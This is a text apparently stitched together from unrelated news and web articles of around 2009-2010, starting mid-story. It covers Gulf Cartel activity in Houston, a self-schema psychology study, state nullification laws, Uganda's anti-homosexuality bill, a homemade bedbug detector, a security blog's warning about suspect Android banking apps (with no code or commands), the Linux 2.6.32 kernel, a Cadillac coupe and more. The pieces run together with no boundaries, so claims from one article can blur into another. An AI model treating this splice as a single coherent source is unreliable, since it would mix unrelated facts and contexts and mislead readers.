Others are fugitives facing U.S. indictments .
Houston offers the cartel everything it needs : a major highway system , proximity to Mexico , a massive population with accomplices primed to pump drugs farther into the United States .
Law enforcement authorities say the city is home to hundreds of stash houses for weapons , money and drugs .
The cartel has brought with it murders , kidnapping and other crimes , as well as the collateral damage caused by drug use .
“ The Mexican cartels are the most significant organized crime threat to the Western Hemisphere , without question , ” said Texas Department of Public Safety director Steve McCraw , who was raised on the border .
A Gulf Cartel boss 's nephew was shot in the head and left along a Houston street .
A husband and wife related to another drug boss were tortured and killed by home invaders who missed 220 pounds of cocaine in the attic .
Eleven people were charged in October for their connections with a house in far northwest Houston that functioned as a covert operations center for a cartel cell , according the Bureau of Alcohol , Tobacco , Firearms and Explosives .
Agents found drug - packaging equipment , bulk cash , and thousands of rounds of ammunition , as well as night - vision goggles ; “ a submachine gun with a suspected silencer ” and three pistols with laser sights .
The find underscored how the cartel has been able to do its business while blending into the city .
While locked up at in Harris County Jail , a street - hardened 22 - year - old described cutting his teeth to break into the cartel 's lowest ranks .
He told of a journey through a world where machismo flowed thicker than the guns , weapons and dope .
“ Inside the family , people will be killed by their own , everyone who has balls and greed wants to be the boss , ” said Carlos , who asked that his last name not be used .
He said he started out ferrying bundles across the Rio Grande as a human mule , then moved up to extorting border businesses to pay protection money , and continued looking for opportunities .
Hoffman , who was smuggling long before Carlos was born , ended up telling his story on the witness stand in Houston after the Gulf Cartel 's top boss , Juan Garcia Abrego , was captured and shipped here for trial in 1996 .
Lessons from a legend
Garcia , who had been arrested in the United States 12 years earlier on aging auto smuggling charges that were later dropped , was the first Mexican trafficker to make the FBI 's Most Wanted list .
A report by the U.S. Attorney 's Office for the Southern District of Texas contends that over a 16 - year period , Garcia brought in well over 220,000 pounds of nearly pure cocaine .
That equates to enough of the narcotic to get 250 million people high .
It was under Garcia 's rule that the cartel grew far and wide as he capitalized on the lessons said to have been taught to him by his uncle , Juan N. Guerra , a bootlegger who later owned a trucking company and remains a Godfather - like legend in Matamoros , Mexico .
After Garcia went to prison , Osiel Cardenas Guillen , a street - smart , hot - tempered capo who started out washing cars for wise guys , took the cartel to a bigger stage , and drew U.S. ire like never before , according to reports and records .
Cardenas gained a reputation for being hands on , in your face , and not afraid to unleash brute force .
Having already corrupted members of the very armed forces sent to catch him , Cardenas used a confidant in Mexico 's Special Forces to help launch the Zetas , a band of brutal enforcers , according to an unclassified DEA report .
This private army known for military precision and terror , at least in Mexico , was to serve as a hit squad to kill rivals .
Cardenas went too far in 1999 when he and a gang of henchmen caught an FBI agent and a DEA agent driving through Matamoros with an informant in their car .
An armed standoff ended with the agents and their snitch fleeing back to the United States .
Cardenas , who quickly landed on the FBI 's most wanted list , was arrested in 2003 by the Mexican military after a shootout .
But even from inside a Mexican prison , Cardenas ran the cartel and directed a turf war that tore apart Nuevo Laredo , authorities say .
It was n't until 2007 , when he was extradited to Houston , that he lost power .
Under heavy guard , his location being kept secret for his own safety , Cardenas is believed to be cooperating with prosecutors in exchange for leniency and other considerations .
‘ A shell of its former self '
Stratfor , an Austin - based global intelligence company , contends the cartel can hardly survive the pounding it has taken on all fronts , and that the feared Zetas have founded their own crime syndicate that works with the Gulf Cartel when it is convenient .
“ After nearly three years of bearing the brunt of Mexican military and law enforcement efforts , the Gulf Cartel is now a shell of its former self , ” contends the 16 - page report .
But some federal agents have said that while the Zetas have emerged and are a great threat , the dope will continue to flow and the cartels will fight to persevere .
“ They are not going to go away quietly into the night , ” the DEA 's Campbell said .
“ They are going to try and establish themselves as permanent fixtures . ”
dane.schiller@chron.com
Finding The Surprising Gaps in Your Self - Knowledge
Are you an independent person ?
Classic social psychology research suggests some people ca n’t tell .
Why are people so blissfully ignorant of certain aspects of their personalities ?
Take an everyday example : there are some infuriating people who are always late for appointments .
A few of these people explain it by saying they are ‘ laid - back ’ , while others seem unaware that they ’re always late .
For laid - back people , their lateness is a part of their personality , they are aware of it and presumably not worried about appearing unconscientious .
For the unaware it ’s almost as if they do n’t realise they ’re always late .
How is that possible ?
It ’s probably because they ’ve never noticed or paid attention to the fact that they are always late so they never learn to think of themselves as lacking conscientiousness .
Or so suggests a psychological theory describing how we think about ourselves called self - schema theory .
This theory says that we have developed ‘ schemas ’ , like internal maps of our personalities , which we use to understand and explain our current and future behaviour to ourselves , e.g .
I ’m always on time for meetings so I ’m a conscientious person .
Are you an independent person ?
However schema theory also suggests that these maps have uncharted areas , leaving people with certain blind spots in their self - knowledge .
This aspect of self - schemas was investigated in a classic social psychology study by Professor Hazel Markus ( Markus , 1977 ) who examined not conscientiousness but whether people thought they had independent or dependent personalities .
To do this she gave 48 female participants questionnaires which assessed their self - perceived independence .
It asked whether they were individualists or conformists and whether they were leaders or followers .
From their answers the women were sorted into three groups : independents , dependents and a third group that showed no clear pattern .
This third group that showed no clear pattern was labelled ‘ aschematic ’ , i.e. having no schema about independence or otherwise — for one reason or another it was a hole in their self - knowledge .
Crucially , though , this group was only arrived at after discarding the people who thought the dependence / independence dimension was important but happened to think they were independent in some situations but not in others .
Only those who truly did n’t care either way were labelled aschematic .
So there were some people who appeared not to notice or even care about their independence ( or otherwise ) while others did notice it .
But Markus wanted to see if people were just saying these things , or whether they actually behaved as though they were true .
To find out she invited the same participants back to the lab a few weeks later to give them a few more tests .
This time she flashed up words on a screen , some of which were related to being independent , some dependent and some neither .
It emerged that participants who had said they were independent endorsed more words associated with being independent and did so quicker .
Dependents did the same with words related to being dependent but those who were aschematic showed no preference either way .
In further tests those who had identified themselves as independent remembered more examples of independent behaviour as well as resisting an experimental suggestion that they were n’t independent .
The same pattern was seen with the dependents .
The aschematics , however , could remember few examples demonstrating either dependence or independence and could easily be swayed by experimental suggestion towards believing they were dependent or independent .
It seemed they simply had n’t been paying any attention to situations which marked them out as either dependent or independent people .
Building self - awareness
What these results confirm is that the three groups of participants did actually think in different ways about the idea of independence .
Some believed they were independent , some not and the others did n’t know or , apparently , care .
In some ways the aschematics are the most fascinating category because they are the people that seemed not to realise whether or not they were independent .
And we all have these aschematic areas in our self - knowledge , traits which are blind spots to us but are perfectly obvious to others .
Unfortunately the only way for us to find out is to ask other people , but this may prove difficult or embarrassing .
Still , while our hidden traits might be negative , they might also be positive : people are sometimes surprisingly unaware of their charm , warmth or conscientiousness .
Whether or not we pluck up the courage , this research reveals the fascinating and unnerving idea that some aspects of our own personalities may be completely mysterious to us only because we never bothered to take any notice of them .
Tim Cavanaugh was earlier riffing off the 9th amendment 's multiple ideological uses ; here 's a report from the 10th Amendment Center on some recent action on the notion that the states and the people have some powers reserved to them from the Feds .
Excerpts :
In states around the country , there 's a growing movement to address and resist two of the most abused parts of the Constitution – the Commerce Clause and the 2nd Amendment .
Already being considered in a number of state legislatures , and passed as law in Montana and Tennessee this year , the Firearms Freedom Act ( FFA ) is a state law that seeks to do just that .
The latest to join the FFA movement ?
Kentucky .
Pre-filed for the 2010 legislative session , HB87 seeks to " Create new sections of KRS Chapter 237 , relating to firearms , firearm accessories and ammunition that are made in Kentucky , marked made in Kentucky , and used in Kentucky , to specify that these items are exempt from federal law " … .
All across the country , activists and state - legislators are pressing for similar legislation , to nullify specific federal laws within their states .
A proposed Constitutional Amendment to effectively ban national health care will go to a vote in Arizona in 2010 .
Fourteen states now have some form of medical marijuana laws — in direct contravention to federal laws which state that the plant is illegal in all circumstances .
And , massive state nullification of the 2005 Real ID
Act has rendered the law nearly void .
This sort of nullification of federal law by the states has some awkward history in America , and indeed a court fight is already on over the Firearms Freedom Act in Montana :
In October , the Montana Shooting Sports Association ( MSSA ) and the Second Amendment Foundation ( SAF ) filed a lawsuit in federal court in Missoula , MT to validate the principles and terms of the Montana Firearms Freedom Act ( MFFA ) .
" We feel very strongly that the federal government has gone way too far in attempting to regulate a lot of activity that occurs only in - state , " explained MSSA President Gary Marbut .
" The Montana Legislature and governor agreed with us by enacting the MFFA .
It 's time for Montana and her sister states to take a stand against the bullying federal government , which the Legislature and Governor have done and we are doing with this lawsuit .
We welcome the support of many other states that are stepping up to the plate with their own firearms freedom acts . "
Radley Balko back in September on liberal horror of modern invocations of the 10th .
Even as a growing number of coal - burning power plants around the nation have moved to reduce their air emissions , many of them are creating another problem : water pollution .
Power plants are the nation 's biggest source of toxic waste , and while much of that waste once went into the sky , because of toughened air pollution laws , it now often goes into lakes and rivers , or landfills that have leaked into nearby groundwater , say regulators and environmentalists .
The head of a Christian child sponsorship program says Haiti is a nation “ that you can literally feel the evil in . ”
Dr. Wesley Stafford , president and CEO of Compassion International , told Focus on the Family that Haiti was a disaster before the earthquake ever struck .
Haiti … has been a disaster in almost every way long before this ever struck .
And it is a nation , between you and me , I guess , that Satan has had absolutely free reign in that nation .
And while the missionary effort and the church effort has been enormous , this is a nation that you can literally feel the evil in it .
But then as the church lives out its faith , having come through this deep , deep valley , my great prayer is that there will be a great wave of healing and change in the nation of Haiti … that could only come about through an interruption like this and only happen through the glory of God .
ADVERTISEMENT
Compassion International collects money , in $ 38 increments , to help children in impoverished parts of the world .
According to its
Web site , the “ child advocacy ministry ” tends to more than one million children in 25 countries .
According to Joanne Brokaw at Beliefnet , the group has found sponsors for 64,000 children in Haiti and has dozens of operating centers around the country .
“ Where aid organizations like World Vision work on a larger community scale — for example , being able to immediately respond to the earthquake with supplies , digging wells , building community buildings — Compassion works child to child , pairing a child with a sponsor in a developed country .
The ministry works with local churches to impact a child , their family , and their community , ” Brokaw explains .
Last fall , the organization criticized Secretary of State Hillary Clinton for cutting financial aid to Honduras in the wake of the coup that ousted President Manuel Zelaya .
Communications director Kathy Redmond said that the funding did n’t affect the group ’s finances , but made it more difficult to provide aid .
“ Even when non-humanitarian aid is cut off , it still hurts the most vulnerable that are there , ” Redmond said .
“ And , Honduras–in terms of their economy –is the second poorest nation in the western hemisphere , only behind Haiti . ”
ADVERTISEMENT
This video is from Focus on the Family , broadcast Jan. 18 , 2010 .
Download video via RawReplay.com
Last month , Sens. Maria Cantwell and John McCain proposed a measure that would revive parts of the old Glass - Steagall Act , the 1933 law that separated investment from commercial banking .
After having been diluted many times over the years , Glass - Steagall was largely repealed in 1999 , permitting a wave of consolidation in the financial industry .
The latest crisis has provoked a new debate over the old regulatory regime .
Nobel laureate economist Joseph Stiglitz has argued that the repeal of Glass - Steagall had an " especial role " ...
It 's easy to dismiss Interstellar Marines as an uninspired entry in a long line of first - person shooters .
After all , it 's about marines .
In space .
Who sometimes use flashlights to see in dark hallways and presumably fight aliens .
However , moving past that surface impression , it quickly becomes apparent that this game is something we 're not used to : an Indie game with some major production values , one that 's been a labor of love for its development team for quite some time .
As it turns out , developer Zero Point Games has managed to accomplish this feat without the help of a publisher .
Instead , the company has funded the game 's development through nothing more than its own ingenuity , resulting in a business plan that is — for the moment — an experiment that might very well launch an entirely new category when it comes to independent video games .
A new way to fund indie games
Zero Point has taken a unique approach to funding the game 's development : they 're preselling it and using the cash from fans to continue the work .
It 's certainly a different funding method , but it is n't terribly surprising , since the developer seems dead - set on bucking as many stereotypes as possible by being a " AAA Indie " company .
The AAA Indie concept comes from the AAA label — associated with things of incredibly high - quality — and the fact that Zero Point Software is about as indie a developer as it could possibly be .
" We have always wanted to establish a community for Interstellar Marines while developing the game , " said game director Kim Jørgensen , " primarily because our ambition is making one of the best FPS experiences ever ; we know this can only be achieved if we involve people [ that love and play ] FPS games , so we can get their continuous feedback .
" Through open - door development , free - to - play marketing , social networking , and digital distribution , Zero Point Software has already optimized the value chain down to just the developer making the games and people that buy games .
We currently have [ over 22,000 ] registered marines and the community is growing fast , now that people can actually play Bullseye , our first preview slice .
We have high hopes and faith in this strategy of ours called AAA Indie . "
Keeping things honest
Of course , preselling a game to fans might seem like a dubious way to do business , since there 's no real guarantee that the game is going to come out .
However , the company has a form of insurance for community members to show that their money is going toward more than just the weekend beer supply : the developer is releasing a series of interactive demos on the Web , highlighting different elements of the game .
So far , two of the demos have been put onto the game 's website , The Vault and Bullseye , and four more are currently scheduled before the first game in the trilogy is finally released .
It 's a great idea , since gamers get to see something tangible and are thus more likely to send some cash over to Zero Point .
But the best part is how cool they have been so far .
The Vault is an interactive tease for players , showing off a few different things they 'll get to see in the actual game .
Initially , you walk up to a holographic display showcasing the titular marines and a mech walker battling what looks like combinations of sharks and lions .
You can walk into corresponding rooms and find out details on the specific factions / units that make up the scenes , which means that you can actually get an idea of what 's going to happen in the game 's plot when we see the final release .
Bullseye , meanwhile , is an actual minigame that is more than a little reminiscent of the Namco 's Police Trainer rail shooters .
Players are set loose on a firing range and guided by an Artificial Intelligence program that outlines objectives and then grades players after each level .
Later levels let players unlock and sample the destructive power of advanced weapons and equipment .
The gunplay is solid , and the Unity Engine seems to handle things promisingly enough , though we should wait to see how it performs during a frantic firefight before casting a final verdict .
That said , the last time we saw the Unity Engine being used on such a high - level scale was when we reviewed Cartoon Network Universe : FusionFall .
The game engine now seems to be capable of a presentation that is much more impressive than what was on display at this time last year .
Fans who pre-order the game can select one of two versions to buy : " Spearhead " or " Frontline . "
The former — which costs $ 39.00 — will net players a copy of the entire planned trilogy , a unique unit identity in the game and on the website , and all sorts of goodies like digital wallpaper and free MP3 versions of the soundtrack .
The second version goes for $ 25.00 and provides the same freebies , but only a digital copy of the first game in the series .
Finally , players can simply pledge $ 5 and earn a " Support Medal " label , which will show up in their community identities .
Based on these different levels of support , one might wonder if helping to finance the game or preordering it will give players an unfair advantage when it 's finally released .
Jørgensen is adamant that it wo n't : " Spearhead and Frontline upgrades will not change gameplay ... we do n't want to have people buy game advantages , especially because our big goal for 2010 is to release our competitive multiplayer and that would unbalance the experience if [ Spearhead or Frontline players ] were better just because they supported us with some money .
[ Spearhead and Frontline players ] will have their emblem visible on their shoulder , they get extra bonus content like the Playground level in Bullseye , they stand out due to various visual enhancements , they have beta access to all playable preview slices released , briefing room access and so much more we have n't thought about yet ! "
A multi-platform AAA Indie title ?
While Interstellar Marines might be set to come out on for the PC , 360 , and PS3 , the demos are currently playable via major web browsers on either the Mac or Windows operating systems .
Of course , since they rely on the Unity Engine , different Web browsers work with varying degrees of success : performance is rather slow when played in Safari , Google Chrome can't utilize the engine at all yet , but Firefox and Internet Explorer do n't seem to have any problems with it .
Of course , the console development for the game is n't as high a priority as the PC version , though it 's still tentatively planned .
" If enough people want [ the game ] on consoles and when Unity moves their technology to consoles ( which they are ) we will have Interstellar Marines on consoles as well , " said Jørgensen .
" We just need to convince Microsoft and Sony to serve the game digitally .
We do not necessary expect the development to be completely parallel with the development on the PC version , but who knows . "
It 's been well - documented how difficult it is for indie developers to get funding , but Zero Point Software 's quest for funds seems to have been surprisingly fruitful .
Granted , the game is a ways off from actual arrival in mainstream markets , but the developer has managed to steadily continue down a path toward this goal .
If Interstellar Marines proves successful , this could be the start of AAA Indie games as a legitimate category in the video game industry .
An article appearing in The Guardian over the weekend reports that the death penalty and life imprisonment provisions in Uganda 's " kill the gays " bill as it has come to be known , have not been dropped , as Bloomberg reported last week .
The Guardian spoke with the bill 's main sponsor , David Bahati : " Bahati has just presented his anti-homosexuality bill 2009 to Uganda 's parliament .
The bill , which will be debated within a fortnight and is expected to become law by February , will allow homosexuality to be punishable by death …
He denied reports that international pressure might result in parts of the bill being toned down .
' We are not going to yield to any international pressure – we cannot allow people to play with the future of our children and put aid into the game .
We are not in the trade of values .
We need mutual respect . '"
The White House finally took a public stand on the " kill the gays " bill , late on Friday afternoon and only after prodding from The Advocate 's Kerry Eleveld .
Said the statement : " The president strongly opposes efforts , such as the draft law pending in Uganda , that would criminalize homosexuality and move against the tide of history . "
Iowa Senator Chuck Grassley , under pressure from groups like One Iowa , which began a petition urging the legislator to speak out , finally spoke out in a statement to the Iowa Independent .
Said Grassley : " Based on what I ’ve been able to learn about the legislation and from
the stand point that I ’m a born again Christian , I can tell you that I
do n’t agree with this un-Christian and unjust proposal , and I hope the
Ugandan officials dismiss it . "
GOP Oklahoma Senator Tom Coburn has spoken out as well : “ Over the past two decades , political , religious , and community leaders
in Uganda have united to promote a rare , winning strategy against HIV
that addresses the unique and common risks of every segment of society .
Sadly , some who oppose Uganda ’s common sense ABC strategy are using an
absurd proposal to execute gays to undermine this coalition and winning
strategy .
Officials in Uganda should come to their senses and take
whatever steps are necessary to withdraw this proposal that will do
nothing but harm a winning strategy that is saving lives . ”
And Wisconsin Senator and Chairman of the U.S. Senate Foreign Relations Subcommittee on African Affairs Russ Feingold released a statement .
Said Feingold : " I share the outrage of many political , religious and
civic leaders in Uganda and around the world about the
“ anti-homosexuality bill ” before the Ugandan Parliament .
If enacted ,
this inhumane bill would sanction new levels of violence against people
in Uganda based solely on their gender or sexual orientation .
Its
passage would hurt the close working relationship between our two
countries , especially in the fight against HIV / AIDS .
Over the last
month , I have conveyed these concerns to the State Department and
directly to President Museveni , and I urge Uganda ’s leaders to reject
this bill . "
Finally ,
The Vatican released a curiously timed statement which did not mention Uganda directly but appears to address the situation there :
" As stated during the debate of the General Assembly last year , the Holy See continues to oppose all grave violations of human rights against homosexual persons , such as the use of the death penalty , torture and other cruel , inhuman and degrading punishment .
The Holy See also opposes all forms of violence and unjust discrimination against homosexual persons , including discriminatory penal legislation which undermines the inherent dignity of the human person .
As raised by some of the panelists today , the murder and abuse of homosexual persons are to be confronted on all levels , especially when such violence is perpetrated by the State .
While the Holy See ’s position on the concepts of sexual orientation and gender identity remains well known , we continue to call on all States and individuals to respect the rights of all persons and to work to promote their inherent dignity and worth . "
INDIANAPOLIS —
After trying some 50 arrangements of household objects , researchers have come up with a new low - cost , homemade bedbug detector .
To lure the bugs out of hiding , Wan -Tien Tsai of Rutgers University in New Brunswick put dry ice into an insulated , one - third - gallon jug , the kind available at sports or camping stores .
Adding 2.5 pounds of dry ice pellets and not quite closing the pour hole allowed carbon dioxide to leak out at a bug - teasing rate for some 11 hours at room temperature , she said .
She stood the jug in a plastic cat food dish with a piece of paper taped on the outside of the dish as a ramp up to the rim .
The bowl ’s steep , slippery inside , with an added dusting of talcum powder , kept bugs from crawling out again .
In tests in real apartments , the homemade setup detected bedbugs as well , or better , than did two brands of professional exterminating equipment , Tsai said Dec. 16 at the annual meeting of the Entomological Society of America .
The parts , including the dry ice , cost $ 15 and do n’t require any special skills for assembly .
“ Everyone can do it , ” she said .
These days a growing number of people might want to .
The tiny , night - crawling bugs that draw blood and can leave itching welts had dwindled to rarity in North America during most of the last century .
But since the 1990s , outbreaks have surged .
The bugs flatten themselves into crevices in furniture , fabric and even electrical devices , and can prove difficult to eradicate .
Many of today ’s bedbugs are resistant to pyrethroid insecticides , which account for much of indoor pest treatments .
Tsai worked with Changlu Wang , also at Rutgers , for six months on designing homemade devices that lure bedbugs out into a trap so residents can tell whether a home is infested .
Like many insects that search for blood , bedbugs are attracted to plumes of concentrated carbon dioxide , good clues that an animal filled with liquid dinner is breathing somewhere nearby .
In lab tests , carbon dioxide beat heat and several chemical attractants in drawing the bugs out of hiding , Wang reported at the meeting .
He has published on low - tech ways to attract bedbugs with carbon dioxide .
For example , setting out dry ice in insulated travel mugs can work .
Apartment dwellers do n’t need to research supply companies for dry ice .
Beverage companies , for example , may sell it by the pound .
To design a new low - tech detection system , Tsai experimented with various setups but says her breakthrough came when she discovered the one - third - gallon insulated jugs .
They performed well in lab tests , so she decided to test them in apartments that had low levels of bedbug infestation .
She searched for bedbugs herself to confirm that apartments were suitable .
Then she set either her homemade detector or a commercial one in each apartment near a typical bug haven , such as the sofa .
Designing and testing a low - cost detector is a substantial contribution to the field , comments entomologist Stephen Kells of the University of Minnesota in St. Paul .
During decades of low bedbug infestation , scientists did n’t study them much .
" We have literally skipped a generation of knowledge with this pest , " he says .
Studies from early in the last century may not describe today ’s bedbugs well , says entomologist Andrea Polanco - Pinzón of Virginia Tech in Blacksburg .
Older generations of bedbugs were n’t resistant to pesticides and lived in tougher environments : houses without central heating .
On the bright side though , Polanco - Pinzón reported at the meeting that her survival tests found that a pesticide - resistant strain she collected from Richmond , Va. , lived at most two months without feeding .
That record , set by the fifth stage of the immature bugs , falls far short of the year and a half reported in the old literature .
Image : Flickr / Richard_Pluck
See Also :
<<< NEWS FROM THE LAB - Monday , January 11 , 2010 >>>
ARCHIVES | SEARCH Warning On Possible Android Mobile Trojans Posted by Mikko @ 13:49 GMT
Google 's Android mobile operating system has been out for a while and is generating more and more interest .
Now there has been some buzz about fraudulent applications being posted on the Android Market .
See these postings :
Both of these apps were written by an anonymous developer known as 09 Droid .
In fact , he had a whole collection of online banking applications for sale on the Market :
( image courtesy of Brandon McGee )
These applications were being sold , but it 's still unclear what exactly they did .
We have n't been able to secure a copy for ourselves yet , so we do n't know either .
Since the applications were not developed or authorized by the banks themselves , they could not do real online banking from the Android device .
Apparently they only opened the web interface of the online bank for the user .
On the other hand , they could have stolen user credentials .
We can't ask these questions from Mr. 09 Droid himself either , as he is nowhere to be found .
His applications have been removed from the market , and his contact information points to an empty Blogspot page .
In the meanwhile , many of the affected banks have been assuming the worst and have issued public warnings to their customers .
Here 's an example warning from Bayport Credit Union :
In any case , we recommend users to remove applications from 09 Droid from their Android devices .
Updated to add : Developer 09 Droid had at least the following applications for sale in Android Marketplace .
They have all been removed .
Abbey Bank
Alaska USA FCU
Alliance & Leicester ( v. 1.1 )
Bank Atlantic
Bank of America
Bank of Queensland
Barclaycard ( v. 1.1 )
Barclays Bank ( v. 1.2 )
BB&T
Chase
City Bank Texas
Commerce Bank
Compass Bank
Deutsche Bank
Fifty Third Bank v.1.1
First Republic Bank v.1.1
Great Florida Bank
Grupo Banco Popular
HSBC US ( v. 1.2 )
ING DiBa v.1.1
Key Bank
LloydsTSB
M&I
Mechanics Bank v.1.1
MFFCU v.1.1
Midwest
Nationwide ( v. 1.1 )
NatWest ( v. 1.1 )
Navy Federal Credit Union ( v. 1.1 )
PNC
Royal Bank of Canada
RBS v.1.1
SunTrust
TD Bank v.1.1
US Bank v.1.2
USAA v.1.1
Valley Credit Union
Wachovia Corp ( v. 1.2 )
Wells Fargo ( v. 1.1 )
A 32 - year - old woman hanged herself inside a Brooklyn police holding cell , after she was arrested on marijuana charges , police sources said .
The woman , whose name was withheld pending family notification , used her pants to form a crude noose , which she slung around a horizontal cell bar at the 73rd Precinct station house in Brownsville at 6:47 p.m. , sources said .
The woman was found dead 40 minutes after she was placed alone in the cell by officers .
A source said officers typically check on the cells , but it ’s not clear what happened in this case .
After a detective made the horrifying discovery , the woman was taken to Brookdale Hospital , where she was pronounced dead .
Home Super and Inner â€ ” Together at Last !
In an object - oriented language , a derived class may declare a method with the same signature as a method in the base class .
The meaning of the re-declaration depends on the language .
Most commonly , the new declaration overrides the base declaration , perhaps completely replacing it , or perhaps using super to invoke the old implementation .
Another possibility is that the base class always controls the method implementation , and the new declaration merely augments the method in the case that the base method calls inner .
Each possibility has advantages and disadvantages .
In this paper , we explain why programmers need both kinds of method redeclaration , and we present a language that integrates them .
We also present a formal semantics for the new language , and we describe an implementation for MzScheme .
To me , an interesting aspect was interleaving of overrides and augmentations of the same method .
Super and Inner â€ ” Together at Last ! by David S. Goldberg , Robert Bruce Findler , and Matthew Flatt , 2004 .
To me , an interesting aspect was interleaving of overrides and augmentations of the same method .
Comment viewing options
Flat list - collapsed Flat list - expanded Threaded list - collapsed Threaded list - expanded Date - newest first Date - oldest first Select your preferred way to display the comments and click " Save settings " to activate your changes .
After the long wait , the new 2011 Cadillac CTS -V
Coupe is finally here and it is an absolute beast .
Looking like it just ate your neighbor ’s M3 , with a supercharged 6.2 - liter V8 engine putting out 556 horsepower and 551 ft-lb of torque , it can probably dominate anything in your local municipality ( unless you live in Newport Beach ) .
This is the most powerful engine Cadillac has ever offered in a production car and propels the vehicle from 0 - 60 mph in just 3.9 seconds .
Transmission options include a Tremac dual - disc six - speed manual and a Hydra - Matic six - speed automatic with paddle shifters .
The official introductions will comes next week at the 2010 North American International Auto Show taking place in Detroit .
The design aesthetic is sleek and aggressive with several enhancements that immediately set it apart from the other members of its family .
A special grill effectively doubles the car ’s intake and a symmetric hood bulb makes room for the massive supercharger caged beneath .
In addition , the front and rear fascia has been updated for better aerodynamics and the exhaust sytem steps up to twin pipes .
Performance is the name of the game and Cadillac reworked every detail for their new luxury sports coupe .
With all of the car ’s heft , Cadillac turned to Brembo to engineer some serious stopping power .
As such , the car is outfitted with six - piston calipers up front and four - piston calipers in the rear .
The slotted and vented rotors sitting behind the 19 - inch aluminum wheels make for an impressive showing .
The standard suspension system is none other than Cadillac ’s stellar Magnetic Ride Control platform .
Inside the new CTS - V Coupe , there is the ubiquitous 2+2 configuration with the front passengers comfortably seated in 14 - way Recaro seats .
Faux - suede microfiber is used on the seat inserts , shifter and steering wheel and a new color option , Saffron , is now available .
The center stack , console and door trim is finished in Obsidian black and hand - stitching adds a touch of elegance to areas such as the instrument panel .
Cadillac is known for its technological advancements and the infotainment system does n’t disappoint with a 40 - gig hard - drive , deployable nav screen and Bose sound system with integrated Bluetooth .
The new 2011 Cadillac CTS -V
Coupe will go on sale this summer .
No pricing information has been released .
Check back for more info as we will be on hand and providing full coverage of the North American International Auto Show in Detroit .
Source : Cadillac
“ Twenty years ago , people who came to work in the federal government had better technology at work than at home , ” said Orszag , director of the Office of Management and Budget .
“ Now that ’s no longer the case .
“ The American people deserve better service from their government , and better return for their tax dollars . ”
The White House release that included Orszag ’s comments said one “ specific source ” of ineffective and inefficient government is the huge technology gap between the public and private sectors that results in billions of dollars in waste , slow and inadequate customer service and a lack of transparency about how dollars are spent .
ADVERTISEMENT
Obama is meeting with CEOs to solicit their views on how to improve the federal government with new information technology .
“ Improving the technology our government uses is n’t about having the fanciest bells and whistles on our websites — it ’s about how we use the American people ’s hard - earned tax dollars to make government work better for them , ” Obama said in a statement .
Obama had proposed the meeting in April .
CEOs from Craigslist , Facebook , Microsoft , Adobe Technology and Monster.com are among those taking part .
“ It ’s time to bring government into the 21st century , ” Orszag said .
“ Information technology has the power to transform how government works and revolutionize the ease , convenience and effectiveness by which it serves the American people . "
ADVERTISEMENT
Those attending the summit are to break into smaller groups to discuss streamlining government operations , improving customer service and maximizing return on IT investments .
Also on Hillicon Valley today :
1 2 3 4 5 6 next »
What 's new in Linux 2.6.32
by Thorsten Leemhuis
3D support for newer Radeon graphics chips , better use of power saving features offered by the latest hardware and numerous enhancements to KVM and Btrfs are some of the outstanding items among the many thousands of changes undertaken for the latest kernel version .
Various other improvements should also make Linux 2.6.32 more reactive and as a result , feel faster .
Nearly three months after the release of Linux kernel 2.6.31 , Linus Torvalds has now put the lid on Linux 2.6.32 development .
Like its predecessors in the main development tree , the new version includes a plethora of new features .
The close collaboration between AMD 's graphics chip department and the open source community has borne further fruit , with Linux 2.6.32 now enabling 3D support and kernel - based mode setting ( KMS ) on the widely - used Radeon 2000 , 3000 and 4000 series graphics cards .
Also new in Linux 2.6.32 is KSM , which merges identical memory pages from different userland processes to reduce memory usage in virtualised environments and make more efficient use of hardware .
Devtmpfs should mean that the Linux kernel boots faster and no longer requires udev , while new make targets will allow testers to easily generate kernel configurations adapted to their systems .
There is also now support for Intel 's Moorestown platform , SFI ( its alternative to ACPI ) , ACPI 4.0 and Trusted Execution Technology ( TXT – previously known as ' LaGrande ' )
Some major changes to the power management code lay the foundations for making better use of runtime power saving features on modern I /O devices .
Various enhancements to the Cpuidle framework , the block layer and Btrfs also offer hope of higher data throughput rates .
Linux 2.6.32 should not only allow PCs to push more data around , it should also feel faster , with changes to the block layer and the process scheduler promising better reactivity .
The Kernel Log which follows gives an overview of these and many other changes in the newly released Linux kernel .
Even those Linux users who take little interest in their Linux distribution 's kernel will also eventually benefit from these changes , as future distributions will utilise Linux 2.6.32 or its successors .
Graphics
The kernel and its Direct Rendering Manager ( DRM ) will now offer 3D support and kernel - based mode setting ( KMS ) for AMD 's series R600 and R700 GPUs .
These are used in the Radeon series 2000 , 3000 and 4000 models – which includes most of the Radeon graphics cards sold in the past couple of years as well as various AMD series 700 motherboard chip-sets .
For the 3D support and KMS to function , however , suitable ( developer ) versions of Libdrm and Mesa 3D as well as Radeon graphics drivers for X.org need to be installed .
Compiling this software stack is a task for advanced users – the recently released Fedora 12 already has everything needed , post install only the experimental Mesa support must be added from the repositories .
The " video= " parameter in the KMS code can now be used for setting a specific output screen resolution for either individual monitors , or for all monitors .
The Intel KMS code will now compress the frame buffer , which reportedly reduces power consumption by up to 0.5 watts ; in addition , the new " Dynamic Clock Frequency Control " feature is intended to further reduce power consumption by reducing the LCD refresh rate , the memory 's self refresh and the clock rate to prolong notebook battery life .
The kernel hackers have also integrated the VGA arbitration patches ( 1 , 2 , documentation ) .
In systems with several graphics cards , the patches cooperate with X Servers from version 1.7 to ensure that the respective graphics card will actually receive the VGA commands sent to it by the X Server – which reportedly allows much more flexibility when implementing multi-seat environments .
Next : File systems , Block layer , Devtmpfs
1 2 3 4 5 6 next »
Print Version | Permalink : http://h-online.com/-872271
Maan said Malsin sounded ' shaken and confused ' as he left A US journalist with a Palestinian news agency has been expelled after Israel refused him entry and detained him for a week , the agency says .
But Israel 's Interior Ministry says Jared Malsin made his own choice to leave , including dropping his legal bid to reverse the entry denial .
Maan , the news agency , has raised concerns that Mr Malsin 's decision may have been made " under duress " .
Israel denies claims that the entry denial was linked to Mr Malsin 's work .
Mr Malsin , the English language editor at the West Bank - based agency , had been detained since he returned from a holiday in Prague eight days ago .
The Israeli Interior Ministry says he was denied entry for failing to co-operate under questioning .
Maan earlier said the decision could " only be explained as a retaliatory measure for his reporting on Palestine " .
On Tuesday Maan said it had won a legal bid to secure a hearing on the case .
It said its lawyer had filed a request to allow Mr Malsin to leave Israel , rather than stay in detention at the airport , while his appeal was heard .
But soon afterwards , Maan said its lawyer was shocked to hear the court had received a notification , signed by Mr Malsin , asking for his appeal to be withdrawn .
